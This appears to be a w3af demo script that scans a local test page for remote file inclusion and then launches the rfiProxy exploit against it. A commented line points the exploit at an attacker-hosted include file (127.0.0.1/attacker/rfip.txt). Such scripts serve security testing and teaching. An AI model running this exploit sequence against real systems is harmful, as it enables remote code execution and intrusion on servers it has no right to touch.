# This is the rfi proxy demo

plugins
audit remoteFileInclude
audit config remoteFileInclude
view
set listenAddress 127.0.0.1
set usew3afSite False
back

output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbosity 10
back
output config console
set verbosity 0
back
back

target
set target http://localhost/w3af/remoteFileInclusion/vulnerable.php?file=f0as9
back
start

exploit
exploit config rfiProxy
set listenAddress 127.0.0.1
set proxyPublicIP 127.0.0.1
# With rfiConnGenerator configured
#set rfiConnGenerator http://127.0.0.1/attacker/rfip.txt
back
exploit rfiProxy
#back
#exit
